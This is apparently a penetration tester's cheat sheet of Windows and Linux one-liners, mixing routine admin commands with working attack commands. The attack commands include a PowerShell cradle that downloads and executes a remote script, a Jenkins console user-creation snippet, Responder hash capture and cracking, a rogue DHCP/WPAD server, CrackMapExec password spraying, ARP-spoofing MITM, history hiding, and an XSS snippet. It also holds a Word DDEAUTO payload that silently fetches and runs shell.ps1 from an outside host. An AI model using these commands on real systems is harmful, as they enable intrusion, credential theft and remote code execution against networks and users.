Poor-man’s ping sweep on Windows:
for /L %A in (1,1,5) do (for /L %B in (0,1,5) do (for /L %C in (0,1,5) do (for /L %D in (0,1,5) do ping -n 1 %A.%B.%C.%D))) >> output.txt
Replace the 5’s with your desired range for each octet.
Find the domain controller in your local network:
nslookup -type=all _ldap._tcp.dc._msdcs.DOMAIN_NAME
Replace DOMAIN_NAME with the actual domain, available through systeminfo
Jenkins script execution (Groovy script console):
def command = """net user YOURNEWUSER YOURNEWPASSWORD /ADD"""
def proc = command.execute()
proc.waitFor()
println "stdout: ${proc.in.text}"
Download and execute via PowerShell:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.4:8000/SomeScript.ps1');Invoke-SomeMethod -SomeParameter SomeValue"
Generate all numbers from zero to 200 with equal width (leading zeroes):
seq -w 0 1 200
Generating usernames when convention is known:
echo -e {a..z}{A..Z}{0..9}| sed 's/ /\r\n/g'
Post-exploitation activities in order of noisiness:
- Responder when on a busy network
sudo python Responder.py -i 1.2.3.4 -I eth0 -rdfw
- Crack hashes
john Responder/logs/SMB-NTLMv2-SSP-1.2.3.4.txt --wordlist=BigPasswordList --rules
hashcat64.exe --remove -a 0 -m 5500 -o Cracked.txt hashes.txt Passwords.txt -r d3adhob0.rule.txt
- Rogue DHCP server on the network (from the Responder package)
sudo python DHCP.py -I eth0 -r GATEWAYIP -p ATTACKERIP -s 127.0.1.1 -n 255.SUB.NET.MASK -d "DOMAIN_NAME" -w "http://ATTACKERIP/wpad.dat"
- CrackMapExec for local admin account with weak default password
sudo cme smb smb-targets -u Administrator -p password --local-auth
- CrackMapExec when username convention is known
sudo cme smb smb-targets -u usersinfile -p defaultpassword
- Grab the frontpage of common web application ports
while read line ; do wget http://$line:80 --no-check-certificate -T 5 -t 2 -O frontpages/$line.html -o logfile.txt ; done < 1.2.3.4-masscan-port-80-ips
while read line ; do wget https://$line:443 --no-check-certificate -T 5 -t 2 -O frontpages/$line-443.html -o logfile.txt ; done < 1.2.3.4-masscan-port-443-ips
while read line ; do wget http://$line:8080 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8080.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8080-ips
while read line ; do wget http://$line:7001 --no-check-certificate -T 5 -t 2 -O frontpages/$line-7001.html -o logfile.txt ; done < 1.2.3.4-masscan-port-7001-ips
while read line ; do wget http://$line:8085 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8085.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8085-ips
while read line ; do wget http://$line:8090 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8090.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8090-ips
while read line ; do wget http://$line:8081 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8081.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8081-ips
- Masscan of ports (all ports here; narrow -p for select ports)
masscan -p 0-65535 1.2.3.4/24 --rate=40000 -oG 1.2.3.4-masscan-port-all
Get most commonly occurring ports on the network after a full masscan:
cat 1.2.3.4-masscan-port-all | awk '{print $3}' | sort | uniq -c | sort -n > top-ports
Decompile JNLP applications:
- Download the JNLP file, open it up, copy all JAR-file URLs into a file
- Run through the file and download all the JARs
- Unpack all the JARs:
touch jars && ls | grep '\.jar$' > jars && while read line; do unzip "$line" -d "$line-unpacked"; done < jars
- Decompile the JARs with your favorite tool
Man-In-The-Middle without GUI tools:
- sudo apt-get install dsniff
- sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>
- All traffic will now end up on your computer. To automatically forward said traffic, run the following command:
sudo sysctl net.ipv4.conf.all.forwarding=1
- Traffic is now being forwarded. To see if you already have this enabled, run this:
sysctl -a | grep forward
- To disable it, just set forwarding=0
- Now you can run Wireshark or tcpdump and sniff the traffic.
Man-In-The-Middle’ing web applications:
So you’ve successfully MITM’ed a host on the network. Now you can intercept traffic and files and what-not, but how about not just intercepting it, but altering it? More precisely, let’s say you want to intercept and alter every request made to a website. This can be done with some iptables magic and the Burp proxy. On a Linux box, execute the following:
iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j DNAT --to 192.168.0.5:8080
This will make everything that is received on eth0 heading for port 443 pass through the proxy you have listening on port 8080 on the IP 192.168.0.5. When you’re done, in my experience it’s easier to just clear the iptables rules and re-run your usual setup script, rather than extracting the lines you’ve just entered.
Get linecount for code review estimation:
find $(pwd) -iname '*.java' > files.txt && while read line ; do wc -l "$line" ; done < files.txt > counts.txt && rm files.txt && cat counts.txt | cut -d" " -f1 > numbers.txt && rm counts.txt && sum=0 ; while read num ; do sum=$(($sum + $num)) ; done < numbers.txt ; echo $sum && rm numbers.txt
Diffing files and folders:
diff <folder1> <folder2> -E -b -B -r -q
This will list all the files that differ.
diff <folder1> <folder2> -E -b -B -r
This will show the actual differences.
DNS cache snooping:
dig @<dns-server-ip> <domain-to-lookup> A (regular lookup)
dig @<dns-server-ip> <domain-to-lookup> A +norecurse (cached lookup)
Split string on delimiters:
cut -d ':' -f 2 twitter.txt
This will split on the : character and remove it together with the left-hand side of the string. -f 1 will remove the delimiter and the right-hand side instead.
How to tar certain filetypes recursively:
find . -type f -iname '*.exe' > all_exe_files.txt
tar -cvf tar.tar -T all_exe_files.txt
Verify if SSL session caching is enabled:
openssl s_client -connect <ip>:<port> -reconnect
If the session IDs are the same, it’s enabled.
Verify if HTTP DEBUG is enabled in a oneliner:
echo -e "DEBUG /page.aspx HTTP/1.0\r\nCommand: stop-debug\r\n\r\n" | openssl s_client -connect <ip>:<port> -quiet
If it returns 200 OK, it’s enabled.
How to verify weak IPsec settings:
ike-scan <ip> --trans="(1=x,2=y,3=z,4=w)"
where x=encryption algorithm, y=hash, z=auth, w=DH group. See nta-monitor.com/wiki
DNS amplification DoS (open resolver check):
dig . NS @<ip>
How to verify if TRACE is enabled:
telnet to the server and send:
TRACE / HTTP/1.0
XST: <some number>
TC: <some number>
<enter> (an empty line ends the request)
Show iptables rules and policies:
iptables -L -n --line-numbers
Kill process in Windows running under admin-user:
runas /user:<domain>\<username> cmd
wmic process where name="process.exe" delete
Linux get filesize
du <folder> -hc | grep total
Allow local user access via SSH:
nano /etc/ssh/sshd_config
Find the line "DenyUsers <username>" and put a # in front of it, then restart sshd.
Hide shell history
unset HISTFILE
How to run commands as admin on Windows:
Go to a command prompt and type in: runas /user:[DOMAIN]\[USER] [COMMAND]
Reconnecting a client to WSUS
wuauclt /resetauthorization /detectnow
Force update of GPO
gpupdate /force
Grepping through everything:
grep -rail (recursive, treat everything as text, case insensitive, output only the names of files with matches)
Convert epoch to human format:
cat access.log | awk '{$1=strftime("%F %T", $1, 1); print $0}'
Example: date +%s | awk '{$1=strftime("%F %T", $1, 1); print $0}'
DDE macro-less exploitation:
In Word, press Ctrl+F9 to insert a field. Right click and enable field codes. Enter the following code:
DDEAUTO "APPLICATION_NAME" " \\..\\Windows\\ABCDEFGHIJKLMNOPQRSTUVXYZ\\..\\System32\\calc.exe" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABC"
APPLICATION_NAME is the name of the application that Word will ask you if you want to start.
ABCDEFGHJ… is the remote data that Word will tell you is inaccessible. If you don’t use all characters, you need to pad with \\..’es.
System32\\calc.exe is of course the payload.
AAAAAAAAAAA is the error explanation shown when your payload executes. The less you pad before ABCDEFG, the more characters you have for this message.
The more you pad, the less room there is for your payload. This is my go-to DDEAUTO, without any attempt at hiding it:
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -w Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://mydomain/shell.ps1');powershell $e"
Using XSS to replace content:
<script>document.getElementsByTagName("h2")[2].innerHTML="your content"; document.getElementsByTagName("h1")[0].innerHTML="other stuff";</script>
Replaces the 3rd H2 tag's content (index 2) and the first H1's content.